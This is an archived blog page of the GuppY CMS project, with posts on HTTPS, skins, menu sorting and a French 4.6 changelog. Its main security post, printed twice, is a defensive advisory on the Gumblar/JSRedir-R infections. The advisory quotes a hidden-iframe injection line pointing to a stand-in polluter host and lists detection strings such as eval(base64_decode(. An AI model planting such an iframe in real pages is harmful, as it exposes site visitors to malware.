By continuing your navigation on this site, you accept the use of cookies to offer you contents and adapted services. Legal Notice.
 
 
 
 

GuppY, the benchmark database free CMS

 

telecharger01.png

 
You are here :   Welcome » BloggY » All the posts
 
 
 
    Print this page...
    Print this section...

BloggY - All the posts

Activation du protocole HTTPS  -  by Guppy_Team

Hello,

One of the innovations of the next version of GuppY will be the consideration of the HTTPS secure protocol.

You have probably read in the specialized press that in the near future unsecured sites will no longer be referenced, or less well referenced, dixit Google for example.

We do not give in to a fashion, but we propose it for a greater security of your data, for the protection of your privacy.

Your connections on your site, that of your visitors will be fully encrypted and secure.

In your browser you can see the list of systems used by placing your cursor on the small green padlock when you are on a page in HTTPS.

This protocol can already be activated by mutualisation with certain hosting companies like our partner Nuxit of course, also with OVH and 1 & 1 where we have a domain name for our tests.

Switching to HTTPS induces some constraints, the first is external links, images, videos and documents encapsulated in an iframe that are no longer allowed, only the iframes of the site can be displayed.

Be careful, your entire site must be secure, there can not be mixed content.

The green padlock tells you that communications between your browser and the website are safe. No one can spy on them, and no one can traffic communications. But it does not guarantee anything else!

Be vigilant, and do not entrust any information on any site, padlock or not.

According to the modalities envisaged by your host, in the .htaccess of the root, you will have only a redirection HTTP => HTTPS allowing to return all your visitors to the secured version.

On all official GuppY sites, the HTTPS secure protocol is enabled.

Despite our research, if you see the green padlock with a warning for mixed content, please report us the page.

Published on 10/11/2016 @ 21:19 
Updated skins and customization  -  by Guppy_Team

Important information for the development of skins and customization
 


Hello,

The next 5.01.03 Guppy version should be available for download early June, it must bring a lot of new features, changes and corrections.

Of these, a significant change is the removal in all files of all display styles to group in GuppY css files as recommended by all standards.
Our friend Saxbar worked there for several months and we are coming to the end of the corrections, the first tests are very encouraging and we invite you to continue in this direction.

Actually we do not have much choice if we want to continue developing Guppy 5 and be firmly on the path of a modern CMS, always at the forefront of new web technologies. After the release of GuppY 5.01.00 in mid-June 2015, this is another important step.

We are aware of the changes that this implies for skins Guppy, Guppy for users:

- The use of skins compatible with config look is indispensable with some advantages, clicking Generate style refreshments and one or more of the page and your skin will be updated to Version 5.01.03. You will have nothing else to do!

- Customizing the background of your site should be in the file styleplus.css exclusively. If you made changes directly in the style.css file, you have a little over a month to postpone the styleplus.css file. If you do not, you can not update your skin and manually changing the style.css not be possible.

- For the future, for each patch, you can update your skin with one click Build Style.

To date, nearly one hundred skins are compatible Config look, look config usage tutorial will be updated on the Help Centre GuppY before the release of 5.01.03, and of course all the team will be present to help.

Thank you for your loyalty to Guppy, your support is important to us.

Best regards

The GuppY Team

Published on 30/04/2016 @ 17:20 
Commissioning of the automatic creation of twitter son from the Bloggy http://www.freeguppy.org
Published on 05/01/2011 @ 04:52 

caution.gif
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:

    * Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
    * Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
    * If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
    * The site will in turn be polluted by the pirates and will then pollute many others.

How do you realize that the site has been infected?

    * If your anti-virus or your anti-spyware displays an alert of iframe attack.
    * If Google or another search engine warns you that your site is dangerous.
    * If your host blocks the site for that reason.
    * If your browser redirects you to a suspicious site or ask if you accept this redirection.
    * If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
    * ...

What's going on with the infected site ?

    * Files are altered by iframe commands like this:

"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> </ iframe.> "
This is possible because iframes are often invisible on the site (visibility: hidden)

    * In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
    * In other cases, part of the code is encoded in Base64 which gives strings like this one:

Qm9uam91cg == which equals Hello confused
aWZyYW1l which equals iframe
confused

    * The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
      

What to do in case of infection?

    * You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
    * Update Windows or whatever OS you have if it is not yet done.
    * Update your software (Adobe software in particular).
    * Ask all prospective administrators, moderators or editors of your sites to do the same.


As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:

    * Retrieve the local site via FTP and run the antivirus software.
    * Search for files that appear to be heavier or to have different weights.
    * Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
    * Replace or repair the infected files and remove redundant files.
    * Run the antivirus again.
    * Change the FTP code -at least the password- if possible from another PC that has not been infected.
    * upload again the disinfected files and folders on the server.
    * Test the site on line after emptying the cache or the browsers.


If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:

    * You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.


Wise tips:

    * Update software and ask the other site administrators to do the same.
    * Update antivirus and anti spyxwares and ask the other site administrators to do the same.
    * Do not save FTP passwords in particular and enter them each time.
    * Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.


It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.

Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.

    * There are also apps that are capable of eradicating these Trojans but they are usually charged ones.

We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.

For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R

Good luck in case of infections!
JeandePeyrat for GuppY Team.

Published on 02/06/2010 @ 16:19 
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:

    * Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
    * Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
    * If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
    * The site will in turn be polluted by the pirates and will then pollute many others.

How do you realize that the site has been infected?

    * If your anti-virus or your anti-spyware displays an alert of iframe attack.
    * If Google or another search engine warns you that your site is dangerous.
    * If your host blocks the site for that reason.
    * If your browser redirects you to a suspicious site or ask if you accept this redirection.
    * If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
    * ...

What's going on with the infected site ?

    * Files are altered by iframe commands like this:

"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> </ iframe.> "

This is possible because iframes are often invisible on the site (visibility: hidden)

    * In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
    * In other cases, part of the code is encoded in Base64 which gives strings like this one:

Qm9uam91cg == which equals Hello confused
aWZyYW1l which equals iframe
confused

    * The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
      

What to do in case of infection?

    * You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
    * Update Windows or whatever OS you have if it is not yet done.
    * Update your software (Adobe software in particular).
    * Ask all prospective administrators, moderators or editors of your sites to do the same.


As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:


    * Retrieve the local site via FTP and run the antivirus software.
    * Search for files that appear to be heavier or to have different weights.
    * Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
    * Replace or repair the infected files and remove redundant files.
    * Run the antivirus again.
    * Change the FTP code -at least the password- if possible from another PC that has not been infected.
    * upload again the disinfected files and folders on the server.
    * Test the site on line after emptying the cache or the browsers.


If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:

    * You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.


Wise tips:

    * Update software and ask the other site administrators to do the same.
    * Update antivirus and anti spyxwares and ask the other site administrators to do the same.
    * Do not save FTP passwords in particular and enter them each time.
    * Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.


It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.

Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.

    * There are also apps that are capable of eradicating these Trojans but they are usually charged ones.

We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.

For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R

Good luck in case of infections!
JeandePeyrat for GuppY Team.
Published on 02/06/2010 @ 16:19 
Admin zones to check  -  by GuppY_Team

Hello,

from time to time, check your admin / Recommend , you could find spam in it frown

in case of spamming, you can install plugin/fork cryptograph from Hpsam ( GuppYteam member )

 

Another section to check is admin / Maintenance witch keep all the datas you've deleted before.

Published on 31/05/2008 @ 23:15 

To know if one were infected:caution.gif

make an inventory of the various folders of your website, by ftp, by classifying your files by date in the distant repertory. (according to software ftp that you use)

cleanup.jpg



it may be that you find there files gone back to these last days with names “odd” (d.php, cmdwork.txt,…) or even of the index.html files or of the .jpg files which are not images and which do not have anything to do there! , remove them .

the technique which consists in downloading its website and to pass it to the antivirus, can also bear its fruits, you can find Trojans   frown

Published on 12/11/2007 @ 13:15 
Sort the menu  -  by GuppYTeam
Everybody known the tips to sort his articles in the articles box.
You just have to had html comment before titles, like <!--01-->, <!--02--> or <!--03--> for exemple.

But do you know that with GuppY 4.6, it's possible to do the same thing with the menu items ? cool

Go to your Admin > Areas Config. ant test.

You can do the same with plugins name, so you can put a plugin in the middle of GuppY menu.
Published on 05/06/2007 @ 14:01 
4.6 what's new ?  -  by GuppY_Team

Cette version 4.6 n'est point une "révolution" mais une ultime évolution de la série 4.


Attention, il s'agit d'une migration, les skins et forks 4.5 doivent être adaptés, la majorité des plugins doivent être compatible mais il vaut mieux tester.
Certains plugins, forks sont maintenant intégrés tel FCKeditor, Infostech, Fork Blog (un vrai blog maintenant), PGeditor, Fork tri RSS, Fork droits admin plugins.
Avec cette nouvelle mouture arrive un nouveau manuel général, un manuel pour la partie configuration skins qui a beaucoup changée et un manuel sur la création de plugins pour GuppY 4.6.

La grande nouveauté : un Blog !

Moteur :

+ Validation XHTML
* Remplacement des short tags php pour compatibilité php5
* Plein de petites modifications par çi par là pour améliorer plein de choses

Interface :

+ Choix Blog ou Portail en accueil
+ Les items du menu peuvent être ordonnée via la balise
+ Le menu peut être mis dans une boite latérale
+ Plus de position de boites latérales
+ Ajout d'une position de boite supplémentaire sous la boite centrale
+ Le haut de page peut être réorganisé via config boite
+ Possibilité de se connecter/déconnecter facilement
+ Ajout d'un sélecteur de résolution (désactivable dans la skin)
* Logo et copyright en imagettes
* Remplacement de l'éditeur wysiwyg TypeTool par FCKeditor compatible xhtml
* Remplacement du mini-éditeur d'admin
* Remplacement de l'éditeur wysiwyg de postguest par PGeditor
* Amélioration de l'accessibilité et du fonctionnement sans javascript

Administration :

+ Séparation en 4 parties : Configuration skin, Administration, générale, administration des données, Administration des plugins

Configuration skin
+ prévisualisation des avatars, smileys, compteurs et icônes
* Config boites plus intuitive avec 2 boites latérales supplémentaires, possibilité de mettre une autre boite (à choisir) en colonne centrale et/ou en bas de page, possibilité de modifier la position des éléments du haut de page.

Administration, générale
+ La partie à propos permet de vérifier si vous avez la dernière version de GuppY
+ La partie à propos vous donne accès à un récapitulatif d'information à coller dans vos messages sur le forum.
* Les rédacteurs deviennent collaborateurs avec 4 status : Rédacteurs,Modérateur, Webmestre ou Administrateur. Ce status est visible dans le forum.
* Le mot de passe d'un collaborateur n'est plus fixé par l'admin, c'est son mot de passe membre.
+ Possibilité de donner les droits aux collaborateurs sur l'ensemble d'une des 4 parties de l'admin en 1 clic.
+ Les collaborateur ont accès à l'admin rapide des zones qu'ils gèrent.
* Choix du message du livre d'or en page d'accueil, simplifié.
+ Possibilité d'ajouter son identifiant de messagerie instantanée comme moyen de contact Webmaster.

Administration des données
+ Admin rapide selon les droit de chacun des collaborateurs

Administration des plugins
+ Il est possible de donner des droits sur les plugins aux rédacteurs

Articles :

+ Flux RSS des derniers articles

Blog :

+ En pleine page ou intégré au site
+ En page d'accueil pour transformer le portail en blog
+ Boite RSS des amis pour le Blog
+ Publication RSS des derniers billets

Forum :

+ Edition de ses messages
+ Blocage d'un fil en tête de liste
+ Possibilité de clore un fil de discussion
+ Signalisation des messages récents
+ Accès direct au dernier message du fil depuis la liste des fils
+ Choix d'une gamme de rang depuis l'admin
+ Affichage d'une charte
+ Affichage en pleine page du forum
+ Le nombre de catégorie n'est plus limité à 10
+ Possibilité d'ajouter plein de smileys en sus du pack de base.

Newsletter :

* impossibilité d'avoir 2 inscrits avec le même pseudo
+ vérification de l'existance de l'adresse mail
+ possibilité de trier dans différents ordres (chronologique, alphabétique...) les abonnés
+ possibilité de vérifier l'existence des adresses (indicatif)

Photos :

+ Possibilité d'uploader les photos sur la même page que la sélection de photos
+ Rubrique photo relooké avec mignature et effet pellicule photo
+ Evolution des modules photo et photorama avec possibilité de sous-dossiers

RSS :

* Amélioration du lecteur pour contourner certaines restrictions
+ Les flux RSS peuvent être ordonnés via la balise

Téléchargement :

+ ajout d'un accord de licence avant téléchargement

Skin :

* déplacement du répertoire skin : /inc/img/skin/ devient /skin/
+ remplacement du tableau pour le menu par une liste, chaque élément a une classe, la section en cours a une classe spécifique.
+ de nouvelles skins pour le pack original.
+ La position des boites latérales et liée au skin
+ La feuille de style.css est toujours externe
+ Gestion intégrée de la feuille CSS

Autres :

+ Suppression de ses MP par lot
+ Les plugins peuvent afficher des informations dans les zones d'entête de page, et bas de page en plus des boites latérales et de la zones centrale
* La page d'erreur personnalisé renvoie le bon code, plus message de Google "votre page d'erreur renvoie le code 200..."


Voilà il ne vous reste plus qu'à tester et migrer.
Published on 04/06/2007 @ 10:48